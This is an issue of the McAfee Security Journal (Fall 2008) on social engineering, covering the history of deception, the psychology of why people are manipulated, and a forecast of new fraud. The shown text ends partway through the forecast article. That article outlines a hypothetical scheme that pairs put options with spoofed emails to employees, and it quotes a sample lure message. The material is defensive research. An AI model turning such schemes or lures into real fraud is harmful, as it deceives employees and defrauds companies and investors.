
Security Vision from McAfee Avert Labs Fall 2008

Social Engineering: The World's Leading Security Threat

Trojans, click fraud, and money appeals are just a few of the vectors that help malware writers take advantage of Internet users

McAfee Security Journal Fall 2008

Contents

Editor: Dan Sommer
Contributors: Anthony Bettini, Hiep Dang, Benjamin Edelman, Elodie Grandjean, Jeff Green, Aditya Kapoor, Rahul Kashyap, Markus Jakobsson, Karthik Raman, Craig Schmugar
Statistics: Toralv Dirro, Shane Keats, David Marcus, François Paget, Craig Schmugar
Illustrator: Doug Ross
Design: PAIR Design, LLC

Acknowledgements: Many people helped create this issue of the McAfee Security Journal. We would like to cite a number of the key contributors: the senior executives at McAfee, Inc. and McAfee Avert Labs who have supported this creation; our review board: Carl Banzhof, Hiep Dang, David Marcus, Craig Schmugar, Anna Stepanov, and Joe Telafici; our authors and their managers and teammates who have supported them with ideas and comments; marketing mavens Cari Jaquet, Mary Karlton, Beth Martinez, and Jennifer Natwick; public relations pros Joris Evers, his worldwide team, and Red Consultancy Ltd.; our design agency, Pair Design; our printer, RR Donnelley; and Derrick Healy and his mates in our Cork, Ireland, localization office, which has translated this publication into many languages. Thanks to all; we couldn't have achieved this without you! Dan Sommer, Editor

The Origins of Social Engineering. From Odysseus' Trojan horse to phishing on the Internet: Deception just won't go away. By Hiep Dang
Ask and You Will Receive. The psychology of social engineering: Why does it work? By Karthik Raman
Social Engineering 2.0: What's Next. Click fraud appears one of the most likely threats that we'll face in the near future. By Markus Jakobsson
The Beijing Olympics: Prime Target for Social Engineering Malware. The five rings, and other major events, are an irresistible attraction for malware authors. By Elodie Grandjean
Vulnerabilities in the Equities Markets. Can hackers make money from Patch Tuesday and other company news? By Anthony Bettini
The Future of Social Networking Sites. Lots of money and users make social sites another magnet for malware. By Craig Schmugar
The Changing Face of Vulnerabilities. Social engineering tricks can lead users into holes in software. By Rahul Kashyap
Typosquatting: Unintended Adventures in Browsing. Incautious web browsing can lead to the unexpected. By Benjamin Edelman
Whatever Happened to Adware and Spyware? Tougher laws may have tamed adware, but PUPs and Trojans remain. By Aditya Kapoor
Statistics. How risky are top-level domains? By David Marcus

Page numbers as printed in the original contents: 9, 13, 16, 22, 28, 31, 34, 38, 44.

Like it? Hate it? Send your comments to security_journal@mcafee.com.

McAfee Security Journal Debuts


By Jeff Green

Welcome to the first issue of the McAfee Security Journal. We call this a first issue, but we're not really producing this publication for the first time. We have renamed the journal that we have, until recently, called (depending on the country you read it in) McAfee Sage or the McAfee Global Threat Report. In the McAfee Security Journal, you'll find the same outspoken attitude as well as all the dynamic content you have come to expect from the best researchers and authors in computer security research: the experts at McAfee Avert Labs.

In this issue, we take aim at the most insidious and pervasive of all threat vectors: social engineering. Free Tibet! New images of World War 3! IRS Tax Break Secrets! New Gas Saving Technologies! Cheap Medication Online! The list could easily go on, but we hope the point is clear. Effective and seductive messaging is critical to the success of malware writers and identity thieves today, and more so now than ever before.

Social engineering, however, as a method of bilking someone is certainly not new. It has existed since humans have been communicating with one another. You have something I want. I want to talk you into giving it to me or into doing something I want you to do. Social engineering is possibly the most difficult of all threats to combat due to the human element. The easiest way to steal someone's identity might just be to ask for it. Social engineering techniques (Ponzi schemes, confidence tricks, pyramid schemes, simple fraud, phishing, or spam) all follow similar paths. Some of these attacks are physical, while others are digital, but all have elements in common. They have the same aim and in many cases may even use the same techniques. The goal of them all is to manipulate victims through a bug in the human hardware. They all create scenarios that are designed to persuade victims to release information or perform an action.
We have assembled another outstanding collection of researchers and authors to analyze and illustrate this topic for you. We've even broken new ground for our journal: this issue marks the first time we have guest contributors. We start with two of the finest: Dr. Markus Jakobsson of the Palo Alto Research Center and Professor Benjamin Edelman of the Harvard Business School.

We kick off with a look back at the history of deception. Then we peer into the psychology of why these attacks work. Next we look ahead to how social engineering might evolve during the next few years. The 2008 Olympics in Beijing have ended, but malware authors once again attempted to fool sports fans into visiting bogus web sites. Is it possible to make money in the stock market by timing events such as Microsoft's Patch Tuesday or spoofing company news? Our extensive research will offer an answer. What's next with social networking sites? Will security tighten up, or are they doomed to be easy targets because of overly trusting users? We'll also look at how malware writers attack software vulnerabilities and take advantage of typosquatting, the exploitation of incorrectly typed web requests. Our final article will answer the question "Whatever happened to adware and spyware?" We'll finish off with some statistics that show the varying degree of threats to top-level domains around the world. We hope you find this issue as challenging and thought provoking as we do. Thanks for joining us once again as we journey into the depths of computer security.

Jeff Green is senior vice-president of McAfee Avert Labs and Product Development. He has worldwide responsibility for McAfee's entire research organization, located throughout the Americas, Europe, and Asia. Green oversees research teams focused on viruses, hacker/targeted attacks, spyware, spam, phishing, vulnerabilities and patches, and host and network intrusion technologies. He also leads long-term security research to ensure that McAfee stays ahead of emerging threats.


The Origins of Social Engineering


By Hiep Dang

One would be hard pressed today to read a news article or book about computer security without coming across the term social engineering more than once. Popularized by Kevin Mitnick (arguably the most infamous social engineer in the modern computing era), social engineering is in essence the art of persuasion: convincing individuals to disclose confidential data or perform some action. Although social engineering is a contemporary term, the techniques and philosophies behind it have been around as long as humanity itself. We find stories of deception and manipulation in the pages of history, folklore, mythology, religion, and literature.

Prometheus: The God of Social Engineering?

According to Greek mythology, humanity's proficiency in social engineering today is probably a direct result of its greatest mentor: Prometheus, who was so skilled in this craft that he could trick Zeus, the king of gods. In Theogony and Works and Days, the epic poet Hesiod tells the story of Prometheus, a Titan known for his wily ways and cunning tricks. He is credited for the creation of man by molding him out of clay. In what became known as the Trick at Mecone, Prometheus offered Zeus two choices to settle a dispute between the gods and mortals. One offering was ox meat stuffed inside an ox's stomach, the other was an ox bone covered with shining fat. One was nourishment wrapped in a vile covering while the other was an inedible choice, though visually tantalizing. Zeus chose the latter and, as a result, humankind would henceforth need to make sacrifices only of bones and fat to the gods, while keeping the flesh for themselves. Angered at being tricked by Prometheus, Zeus punished mortals by withholding fire. However, in yet another act of social engineering against Zeus, Prometheus stole "the far-seen gleam of unwearying fire in a hollow fennel stalk" from Mount Olympus and bequeathed it to man. As punishment for his acts, Prometheus was chained to a rock, where every day an eagle would come and eat his liver, which would grow back again at night. As a punishment for man, Zeus created the first woman, Pandora, who brought with her a jar that she opened out of curiosity, releasing countless plagues.

Jacob and Rebekah's Phishing Attack

From the Old Testament comes the story of Jacob and his mother, Rebekah, who used a social engineering technique that is the foundation of today's phishing attacks: making the victim believe that the phisher is someone else. Jacob's father and Rebekah's husband, Isaac, had gone blind in the last years of his life. As he prepared for death, he instructed his oldest son, Esau, to "hunt game for me, and prepare for me savory food, such as I love, and bring it to me that I may eat; that I may bless you before I die." (Genesis 27:2-4.) Wanting Jacob instead of Esau to receive Isaac's blessings, Rebekah devised a plan. Jacob was reluctant at first, saying "Behold, my brother Esau is a hairy man, and I am a smooth man. Perhaps my father will feel me, and I shall seem to be mocking him, and bring a curse upon myself and not a blessing." (Genesis 27:11-12.) In order to fool Isaac into believing he was with Esau, Rebekah prepared Isaac's meal, dressed Jacob in Esau's best garments, and attached a goat skin to the smooth parts of Jacob's hands and neck. Jacob delivered the meal to Isaac, passed the authentication test, and successfully gained the blessings that had been intended for Esau.


Samson and Delilah: Espionage for Hire

Samson was a biblical figure with tremendous strength who battled the Philistines. The secret of his power was his long hair. While in Gaza, Samson fell in love with Delilah. The Philistines were able to convince her to uncover the secret of Samson's strength by offering her 1,100 pieces of silver. "Coax him, and find out what makes his strength so great, and how we may overpower him, so that we may bind him in order to subdue him; and we will each give you eleven hundred pieces of silver." (Judges 16:5.) Samson resisted disclosing his secret before succumbing to her persuasiveness. "How can you say, 'I love you,' when your heart is not with me?" she said. "You have mocked me three times now and have not told me what makes your strength so great." Finally, after she had nagged and pestered him day after day, he gave in. "So he said to her, 'A razor has never come upon my head; for I have been a Nazirite to God from my mother's womb. If my head were shaved, then my strength would leave me; I would become weak, and be like anyone else.'" (Judges 16:15-17.) Soon after Samson fell asleep, Delilah exploited his vulnerability by shaving off his hair. In his weakened state, the Philistines seized Samson, gouged out his eyes, bound him in shackles, and imprisoned him for life.

The First Trojan Horse

The story of the Trojan horse, made famous by the Greek epic poet Homer in The Odyssey and the Roman epic poet Virgil in The Aeneid, was one of the most ingenious social engineering tricks in the history of humankind. During the Trojan War, the Greeks could not break down the walls surrounding the city of Troy. The crafty Greek warrior Odysseus devised a ruse to fool the Trojans into believing the Greeks had given up their assault on the city. The Greeks sailed their fleet of ships away and left only a large wooden horse on the beach with a lone Greek soldier named Sinon. After being captured by the Trojans, Sinon told them that the Greeks had left the large wooden horse as an offering to the gods to ensure their safety as they traveled home and that they made it large enough so that the Trojans could not move it into the city, as this would bring the Greeks ill luck. The story was so tantalizing to the Trojans that they moved the wooden horse within the city walls, despite the warnings of Cassandra, who was cursed with the ability to foresee the future without anyone ever believing her, and of Laocoön, a Trojan priest, who said in The Aeneid:

    O wretched countrymen! What fury reigns?
    What more than madness has possess'd your brains?
    Think you the Grecians from your coasts are gone?
    And are Ulysses' arts no better known?
    This hollow fabric either must inclose,
    Within its blind recess, our secret foes;
    Or 'tis an engine rais'd above the town,
    T' o'erlook the walls, and then to batter down.
    Somewhat is sure design'd, by fraud or force:
    Trust not their presents, nor admit the horse.

The Trojans' poor judgment became their downfall. That night, led by Odysseus, the Greek soldiers hidden within the horse killed the guards and opened the gates to the rest of the army. Thanks to the ingenious social engineering tactic devised by Odysseus, the Greeks defeated the Trojans to win the war.

Today's Trojan Horse

When Odysseus devised his scheme to infiltrate Troy, little did he know that he would set a precedent for millennia to come. The name of the most prevalent type of malware found in the wild today, the silicon Trojan horse, was coined by Daniel Edwards of the U.S. government's National Security Agency in the 1970s. Edwards named it after the social engineering technique used by the Greeks. Before the days of the Internet, personal computer users who wanted to share software files did so through physical media (such as floppy disks or tape drives) or by connecting to bulletin board systems (BBSs). Hackers with malicious intent soon realized that they could entice users into executing malicious code simply by disguising it as a game or utility. Due to the simplicity and amazing effectiveness of Trojans, malware authors still use this social engineering technique decades later. Today, PC users are tricked into infecting themselves with Trojans at an alarming rate. They are drawn by the allure of free music, videos, software, and endearing e-cards from anonymous loved ones.


Figure 1: Malware and PUP growth, unique families from 1997 to 2007, in thousands (series plotted: viruses and bots, Trojans, PUPs). The frequency of malware and potentially unwanted programs in McAfee's signature files has seen several spikes in the last decade. In 1998, virus generators came on the scene; in 2003 to 2004, mass mailers became popular; in 2004 to 2005, robot networks were on the rise; and in 2006 to 2007 Trojans took off.

An Updated Con

Advanced Fee Fraud, better known as the Nigerian Email Scam (419 Fraud), has been around for decades and is still one of the most prolific types of spam. The numeral 419 refers to the section of the Nigerian criminal code that outlaws this scam. This get-rich-quick social engineering tactic arrived in the form of a letter and was first delivered to postal mailboxes in the 1970s. The con evolved into unsolicited faxes through the 1980s, and it is almost exclusively sent via email today. Its origins date back to the sixteenth century, when it was known as the Spanish Prisoner con. The scheme is straightforward: a naïve victim is told about an extremely wealthy Spanish prisoner who needs someone's help in getting free. This so-called prisoner relied on the con artist to raise enough money to free him. The con artist approached the victim with the story and allowed him or her to help with a portion of the fundraising, with the promise of great financial gain. We see numerous variations of the letter today, but the concept remains the same. The Nigerian Email Scam lures its victims with the tantalizing promise of a multimillion-dollar payout with an investment of only a few thousand. Even though most recipients realize the offer is too good to be true, an estimated 1 percent of recipients still reply. According to the U.S. Secret Service, the scammers successfully social engineer their victims out of an average of $100 million per year.


Figure 2: Phishing reports, in thousands, November 2003 to November 2007 (series plotted: unique phishing reports, new phishing sites). Phishing reports show steady growth, but the number of new phishing sites has jumped dramatically in the past two years. (Source: Anti-Phishing Working Group)

Phishing

The term phishing was coined by hackers. It derives from fishing because this social engineering technique lures its victims (phish) into disclosing their user names, passwords, credit card numbers, and other personal information. In the 1990s, many hackers exploited America Online's (AOL) free trial offers of Internet service by using fake, autogenerated credit card numbers that didn't actually correspond to existing accounts. After AOL improved its security and credit card validation tests to ensure that credit card numbers were indeed legitimate, the bad guys started going after real user names and passwords to get onto AOL's networks. They started sending fake emails and instant messages that appeared to come from AOL support. Many unsuspecting victims gave away their information and were subsequently billed for the activities and purchases that the hackers made on their compromised accounts. Malicious hackers soon realized the potential profit margin and success rate of such an attack and started targeting companies (banks, eBay, Amazon, and others) that conducted transactions and commerce online.


History of Computer Security

Figure 3: Timeline of significant social engineering events, 1948 to 2008. Years marked on the timeline: 1948, 1965, 1969, 1971, 1978, 1980, 1982, 1983, 1984, 1986, 1988, 1995, 1996, 2000, 2002, 2008. The events shown on the timeline (the year label attached to each was lost in extraction) are:
John von Neumann publishes his theory of Self-Reproducing Automata
Electronic mail (email) is created
ARPANET (precursor to the Internet) is created
Creeper (the first computer virus) is released on ARPANET
John Draper (aka Cap'n Crunch) discovers that a toy whistle in a cereal box can be used to phone phreak
The first public Bulletin Board System (BBS) is set up
Trojan horses start showing up on BBSs
Elk Cloner (the first Apple virus) is released
The Internet is formed from ARPANET
The movie War Games dramatizes the consequences of hacking
Spam (unsolicited email) appears soon after the Internet is made available to the public
Dr. Frederick Cohen publishes Experiments with Computer Virus and credits Leonard Adleman with coining the term computer virus
Brain (the first PC virus) is released
The Morris Worm (the first self-replicating worm) is released
McAfee Avert Labs becomes the industry's first global AV Emergency Response Team
The first phishing attack is devised to steal AOL user passwords
Spyware and adware start to become household names
Kevin Mitnick publishes The Art of Deception, describing his mastery of social engineering
Today, McAfee Avert Labs protects customers from viruses, worms, Trojans, spyware, PUPs, vulnerabilities, spam, phishing, malicious domains, network intrusions, and host intrusions

History Repeats Itself

Whether it's called social engineering, trickery, confidence tricks, cognitive biases, or scams, the concept of exploiting a person's naivety and trust is as prevalent today as it has been since the dawn of time. Ask security experts, and they will agree that people are the weakest link in the security chain. We can develop the most secure software to protect our computers, implement the most restrictive security policies, and strive for utopian user education. However, as long as we continue to be driven by curiosity and greed without concern for the consequences, we could face our own version of a Trojan tragedy.

"Progress, far from consisting in change, depends on retentiveness. When change is absolute, there remains no being to improve and no direction is set for possible improvement: and when experience is not retained, as among savages, infancy is perpetual. Those who cannot remember the past are condemned to repeat it." (George Santayana, in Reason in Common Sense, from The Life of Reason.)

Hiep Dang is the Director of Anti-Malware Research for McAfee Avert Labs. He is responsible for the coordination of McAfee's global team of malware researchers dedicated to the research, analysis, and response to malware outbreaks, including viruses, worms, Trojans, bots, and spyware. Dang is a regular contributor to Avert Labs blogs and white papers and writes for the McAfee Security Journal. He has been interviewed by the Wall Street Journal, MSNBC, PC Magazine, and many other publications and media outlets about new threats and malware trends. Dang is also a devoted practitioner of Wah Lum Tam Tui Northern Praying Mantis Kung Fu and Tai Chi. He is currently on a hiatus from his lifetime of training to concentrate on the computer security industry.

WORKS CITED
Anderson, J. P. (1972). Computer Security Technology Planning Study, vol. II. U.S. Air Force.
Farquhar, M. (2005). A Treasury of Deception. New York: The Penguin Group.
Hesiod (1914). Theogony. (Translated by H. G. Evelyn-White.)
Hesiod (1914). Works and Days. (Translated by H. G. Evelyn-White.)
Homer. The Iliad. (Translated by S. Butler.)
Mitnick, K. (2002). The Art of Deception. Indianapolis, Indiana: Wiley Publishing.
Myers, M. J. (2007). Phishing and Countermeasures. John Wiley & Sons, Inc.
Santayana, G. (1905). The Life of Reason.
Virgil (19 B.C.E.). The Aeneid. (Translated by J. Dryden.)


Ask and You Will Receive


By Karthik Raman

In January 2007, cybercriminals used social engineering tactics to carry out the world's biggest online theft on record, stealing US $1.1 million from customers of the Swedish Nordea Bank. Customers received an email that appeared to have originated from Nordea Bank, and 250 of them downloaded and installed the anti-spam software that the email asked them to set up. The anti-spam software was in fact a Trojan that collected customer information, which the criminals used to log into the bank's web site and steal money.[1]

A well-known information security principle is that in any security system, people are the weakest link. Although security attacks and the defenses developed to respond to those attacks continue to evolve, human nature remains unchanged. To an attacker, social engineering is more efficient and brings quicker returns than a brute-force assault on encryption algorithms, fuzzing to find new software vulnerabilities, or adding complexity to malware. In the Nordea Bank fraud, it was easier for criminals to ask the bank's customers to install a Trojan than to break into a vault to steal cash.

We are gullible, greedy, and curious, which means social engineers can manipulate our feelings and thoughts. They ask us for something, and very often they receive it. But why do we behave this way? In pioneering work on the psychology of security, renowned security expert Bruce Schneier identified four research areas (behavioral economics, psychology of decision-making, psychology of risk, and neuroscience) that can help explain why our feeling of security deviates from reality.[2] This edition of the McAfee Security Journal and this article in particular focus on one aspect of security: social engineering. In this discussion, we shall draw from neuroscience, the psychology of decision making, and elementary social psychology to analyze why people fall for social engineering without perceiving the deception.

A Tale of Two Brains

The human brain is arguably the most complex system in the universe. Part of its complexity lies in its complicated layout and convoluted interaction of subsystems. In the brain, emotions seem to arise from the older, inner parts, such as the amygdala, and reasoning from newer, outer parts, such as the neocortex.[3] But the seats of emotion and reason are not mutually exclusive, as Isaac Asimov observed in his book The Human Brain:[4] "Emotions do not arise from any one small part of the brain, it would appear. Rather, many parts, including the frontal and temporal lobes of the cortex, are involved in a complex interplay." The parts of the brain responsible for emotion and reason can sometimes work with or against one another. That is why it is hard for us to keep reason and emotion separate, and why it is easy for emotion to override reason when the two contradict one another. Let's look at how we deal with fear, for example. Examining how we react to imminent danger, science writer Steven Johnson points out that the fear response is "an orchestral mix of physiological instruments launching with masterful speed and precision":[5] "We talk about it colloquially as the fight-or-flight response. Feeling it kick in is one of the best ways to experience your brain and body as an autonomous system, operating independently of your conscious will."


When revisited by the conditions that led to a fight-or-flight response in the past, we allow the emotional response to take over even though we can reason objectively that the response is without merit. Dishonest politicians, spies, and con men know that appealing to emotion, fear especially, to elicit an emotional response is a very effective means to their ends. Social engineers continue that tradition.

Theories of Social Engineering


Manipulating emotions

Many social engineers zero in on the emotions of fear, curiosity, greed, and sympathy. It is well-established that these are universal emotions; from time to time everyone feels afraid or curious or greedy or sympathetic. Fear and curiosity are useful in many situations. Escaping a burning building is a good thing. Curiosity can help us challenge ourselves and learn something new. Still, acting out of fear or curiosity can cause us to do dangerous or undesirable things.[6] Some attacks can be carried out even without the presence of the social engineer by manipulating a victim's curiosity. In April 2007, a banking Trojan planted in USB drives was left in a London parking lot. People who were curious to see what these drives contained, and likely glad to become owners of a free storage device, plugged the drives into their computers only to infect them with malware.[7] Attackers who threaten or blackmail victims manipulate their fear. The GPcoder.i Trojan, which appeared in June 2008, is an example of malware that manipulated fear: it encrypted users' files and demanded a ransom for their decryption.[8] Likewise, attackers who bribe victims manipulate their greed, and attackers who pose as needing help manipulate their sympathy.

Misdirected mental shortcuts

Sometimes social engineers will appeal to something outside of our emotions. They'll try to trip up our mental rules for processing information. We call these rules heuristics, or rules of thumb. Although we must recognize that our heuristics are fallible, we cannot function without them. Our lives would be too difficult if we had to think through everything we perceived, said, and did. We desperately need our mental shortcuts. Psychologist Robert Cialdini explains this need:[9] "We can't be expected to recognize and analyze all the aspects in each person, event, and situation we encounter in even one day. We haven't the time, energy, or capacity for it. Instead, we must very often use our stereotypes, our rules of thumb, to classify things according to a few key features and then to respond mindlessly when one or another of these trigger features is present." Let's see how social engineers can elicit automatic responses in us that work for them.

Triggering cognitive biases

A cognitive bias is a mental error caused by a simplified information-processing strategy.[10] When a heuristic goes wrong, it becomes a bias. Social engineers nudge our heuristics into severe and systematic errors.[11] Here are a few cognitive biases that can explain social engineering:

Choice-supportive bias: People will remember an option of their choosing in the past as having more positive than negative aspects.[12] An online shopper could get used to purchasing discounted items on the Internet using referrals from friends. An occasional spam email could seem like another referral and lead the shopper into disclosing credit card information to a fraudulent web site.

Confirmation bias: People will collect and interpret evidence in a way that confirms their views.[13] Let's take a hypothetical example. Suppose Acme Corporation contracts with Best Printers to maintain its printers, and all Best Printers service people wear gray, full-sleeved shirts with name badges. Over time, Acme's employees will get used to seeing Best Printers service people in their uniforms and will identify anyone with a gray, full-sleeved shirt and a badge as a custodian. A social engineer could fabricate or steal a Best Printers uniform to pose as a service person. The social engineer may not be challenged to identify himself because of the Acme employees' confirmation bias.

Exposure effect: People like things (and other people) according to how familiar they are with them.[14] News of natural and man-made disasters often spawns phishing web sites that exploit this sentiment.[15] People exposed to such news could be enticed easily into visiting phishing web sites that claim to have a connection with the news. Finally, people's exposure to the news might have lowered their guard with respect to the malicious nature of the web site they are visiting.

Anchoring: People focus on an identifying trait that is first apparent when they make decisions about something.[16] A spoofed bank web site that prominently displays the actual bank's logo might deceive users even if other security indicators scream out the deception.[17]

Causing errors in schemas

Social psychologists define a schema as the picture of reality we refer to, so that we can draw conclusions about our environment. As children, we learn that being nice to others is a good thing. The notorious social engineer Kevin Mitnick has remarked that attackers know this and craft a request to victims to sound so reasonable that it raises no suspicion, all the while exploiting the victim's trust.[18] Thus, social engineers abuse the design of our social schema. Here's a list of common social errors or judgments that people make, with illustrations of how social engineers exploit them:

Fundamental attribution error: People will assume that the behaviors of others reflect their stable, internal characteristics.[19] This is the error of mistaken first impressions. A social engineer will train diligently to make a favorable first impression. Attackers could act personable when making requests or act domineering when coercing victims into doing something. Victims may not realize that their interlocutors are actors and that their behavior is situational, a means to an end.

Salience effect: Given a group of individuals, people will guess that the most or least influential person is the one who stands out the most.[20] Social engineers are expert at fitting into their surroundings and blending in. They strive to flip the salience effect to their favor. They might pose as a client in a business suit or a custodian in overalls, but not as a juggler on stilts. Blending in is not limited to clothing and appearance; it can extend to knowledge of company lingo, events, employees, and even regional accents. A social engineer from California trying to breach a company in Boston may know about Jill's new baby and Josh's leaving the company for a competitor and may exchange this with the receptionist in a Boston accent to be allowed into the office for IT repairs.

Conformity, compliance, and obedience: People respond to the pressures of conformity, compliance, and obedience by changing their behavior. Many social engineering attacks can be explained by victims' predictable responses to these pressures. A social engineer might pretend to be a visiting executive and prevail upon a young security guard to let her enter the premises in spite of the fact that she is not wearing a badge. (The attacker's promise of reward or threat of punishment may further pressure the guard.) The guard may feel overwhelmed and will obey. Group social engineering attacks have not been observed, but they are conceivable. A number of social engineers might pose as legitimate employees and nag a receptionist to gain entry into an office by repeating "Don't waste our time" or "Let us get back to our work." The receptionist might just let them in to avoid being unpopular. A different technique that spies are known to use is to socialize with a victim for a while. The attacker at first requests innocent information from the victim and then moves on to sensitive information. The victim is trapped; he is pressured to comply with the next request, given his history of compliance, or risks a form of blackmail.


Conclusion

Our susceptibility to social engineering is rooted in the design of the human brain, in the complex interplay between the centers of emotion and reason. Social engineering is the manipulation of a victim's fear, curiosity, greed, or sympathy. Cognitive biases and errors in our social schemas help explain social engineering's success.

So why is this knowledge so valuable to us? In the 2007 CSI Computer Crime and Security Survey, only 13 percent of respondents said they had checked how effective their employees' training was against social engineering attacks.21 Although 13 percent is a low figure, the survey did not include those respondents who did not have any training program for social engineering attacks. One obvious step is to create and improve security policies and user education programs about social engineering. Any policy on social engineering will be more persuasive if it uses scientific research to justify itself. User education materials will also be more effective if they list the cognitive biases that social engineers generally exploit, and training videos will be more effective if they demonstrate attacks that exploit each of our cognitive biases.

We can't change human nature. We are born with a split between our emotions and reason, and are prone to committing mental errors. This is normal, but such behavior is dangerous when exploited by social engineers. By understanding the psychology of social engineering and training users about its effects, we can defend against these attacks with greater success.

Karthik Raman, CISSP, is a research scientist at McAfee Avert Labs. His research interests in security include vulnerability analysis, network security, and software security. Beyond security, his interests include the cognitive and social sciences and computer programming. For fun, Raman plays cricket and the guitar and learns languages. Raman graduated with B.S. degrees in computer science and computer security from Norwich University (Vermont) in 2006.

ENDNOTES
1 "Bank loses $1.1M to online fraud," BBC (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm
2 Schneier, B. "The Psychology of Security," Essays and Op Eds (2007). http://www.schneier.com/essay-155.html
3 Ibid.
4 Asimov, I. The Human Brain: Its Capacities and Functions. New York: Mentor Books, 1965.
5 Johnson, S. Mind Wide Open: Your Brain and the Neuroscience of Everyday Life. New York: Scribner, 2004.
6 Svoboda, E. "Cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward," Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html
7 Leyden, J. "Hackers debut malware loaded USB ruse," The Register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/
8 McAfee VIL: GPCoder.i, June 9, 2008. http://vil.nai.com/vil/content/v_145334.htm
9 Cialdini, R. Influence: The Psychology of Persuasion. New York: HarperCollins, 1998.
10 Heuer, Richard J., Jr. The Psychology of Intelligence Analysis, Center for the Study of Intelligence, CIA (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html
11 Tversky, A. and Kahneman, D. "Judgment under uncertainty: Heuristics and biases," Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
12 Mather, M., Shafir, E., and Johnson, M. K. "Misrememberance of options past: Source monitoring and choice," Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf
13 Nickerson, R. S. "Confirmation Bias: A Ubiquitous Phenomenon in Many Guises," Review of General Psychology, Vol. 2, No. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf
14 Zajonc, R. B. "Attitudinal Effects of Mere Exposure," Journal of Personality and Social Psychology, 9, 2, 1-27 (1968).
15 Kaplan, D. "Virginia Tech massacre may spawn phishing scams," SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishing-scams/article/105989/
16 Tversky, A. & Kahneman, D. "Judgment under uncertainty: Heuristics and biases," Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
17 Dhamija, R., Ozment, A., Schechter, S. "The Emperor's New Security Indicators: An evaluation of website authentication and the effect of role playing on usability studies" (2008). http://www.usablesecurity.org/emperor/
18 Mitnick, Kevin D., Simon, William L. The Art of Deception. Indianapolis: Wiley Publishing, Inc., 2002.
19 Gilbert, D. T., & Malone, P. S. "The correspondence bias," Psychological Bulletin, 117, 21-38 (1995). http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20(CORRESPONDENCE%20BIAS).pdf
20 Taylor, S. E. and Fiske, S. T. "Point of view and perceptions of causality," Journal of Personality and Social Psychology, 32, 439-445 (1975).
21 Computer Security Institute, CSI Computer Crime and Security Survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (registration required)


Social Engineering 2.0: What's Next


By Markus Jakobsson

Although social engineering has probably been around since the dawn of human civilization, many are concerned that it is currently transforming and wreaking havoc on the Internet. In this article, we'll offer some predictions about what may come next.

Few would disagree that the current crimeware wave is fed by economic incentives. The current state of affairs stands in stark contrast with the past. Early viruses were simply an expression of intellectual curiosity, competitiveness, and maybe a bit of ennui. The case is even clearer as we turn to click fraud and phishing. What other possible motivation is there than to make a shady buck or two? (Or often a whole lot more.) The same holds for spam in its various forms. If spammers couldn't make money from it, there would be no spam. It is, therefore, rational to consider the ways that criminals can monetize abuses of existing Internet features so that we can predict trends in fraud.

Defenses shape attacks


From the point of view of criminals, Internet fraud is a relatively safe and comfortable crime. Apart from being a crook's telecommuting dream, Internet fraud offers scalability, high profits, and very low traceability, and thus very limited risk. It is no wonder that Internet fraud has taken off. Now, to understand the attacks, we must also understand the defenses. It is clear that the crimes are being fought on three separate planes today: technical features (such as anti-virus software, spam filters, and anti-phishing browser plug-ins); educational campaigns (such as those run by the FTC, eBay, securitycartoon.com, banks, and the Carnegie Mellon University Usable Privacy and Security Laboratory (CUPS) group); and finally, legal means. The legal efforts typically involve tracking origination, raiding drop boxes, and finally, prosecuting offenders. Whereas the technical and educational efforts, if successful, result in a lower yield to criminals, the legal efforts result in a higher risk. These risks are a big deal, especially given how well Internet fraud scales. It is, therefore, fair to assume that the next frontier in Internet crime will involve a component that makes it less traceable. We will make that assumption here and investigate what it could mean for the future. We will do this by considering two types of highly untraceable attacks, neither of which has occurred to date, but both of which are waiting to happen. But first, to truly understand the importance of the legal aspect, we will take a slight tangent and review why ransomware never became the calamity people thought it would be.

Internet Fraud: A Socio-Technical Crime


An increasing number of experts recognize that fraud is no longer only a technical matter, but that to an increasing extent there is also a social engineering component. Phishing is a prime example of this, but not the only one. It is more and more common these days to see crimeware attacks that hinge on social engineering for installation. A recent example of this is the so-called Better Business Bureau scam, shown in Figure 1. In this phishing attack, a potential victim receives an email appearing to come from the Better Business Bureau and relating to a case against the recipient's organization. The attachment, which supposedly contains the details of the complaint, in reality contains a Trojan downloader. To make matters worse, these emails are often sent to people high up in the targeted organization, often to individuals who deal with customer complaints on a daily basis.


Ransomware Fails

In the late 1990s, researchers at Columbia University posited that the next wave of malware might attempt to hold the files on the victim's computer hostage by encrypting them using a public key carried in the malware body, and demand a ransom for the secret key needed to regain access to the encrypted files. Years later, the Archiveus Trojan carried out an attack just like that, although with a small difference: it used symmetric-key cryptography instead of a public key. The attack was foiled when the Trojan was reverse engineered and the encryption/decryption key was extracted and distributed to anybody who was attacked. But maybe the Archiveus attack would not have succeeded even if it had used public-key cryptography (which, by its nature, would have prevented anyone's reverse-engineering the decryption key from the code, since it would never be contained there in the first place). The reason Archiveus might have failed is not technical, but lies in the monetization aspect: there was no way the criminals could have safely collected the ransom without being traced.

Vandalware strikes

With the ransomware example in mind, let us now consider a new type of attack, which we can call vandalware. This attack does not carry out vandalism for fun or defiance, but rather for profit. Here is what the criminal would do. First, he or she would select a company to target, and use data-mining techniques to get as much detailed information as possible about vulnerable employees. By "vulnerable employee," we mean an employee with access to sensitive data or to the web page façade of the company. From the vulnerable employee, a vandal might learn about the internal structure of the company, the names of key employees, and the format of email addresses. Second, the criminal would buy put options for that company. (We are assuming that it is a publicly traded company.) A put option is a financial instrument that increases in value if the corresponding stock falls in price; investors and speculators use put options to turn a profit from an insight that a given stock is soon to lose value. Most likely, other investors, not just the criminal, would also buy put options, especially if the stock of the targeted company has a reasonable trading volume. Third, the criminal would unleash an attack against the company, perhaps by sending selected employees spoofed email appearing to come from another employee, such as their boss: "Hi Jim. Please take a look at the attached PowerPoint slides and let me know what you think. If possible, I'd like a quick assessment by tomorrow morning. Hope you can make 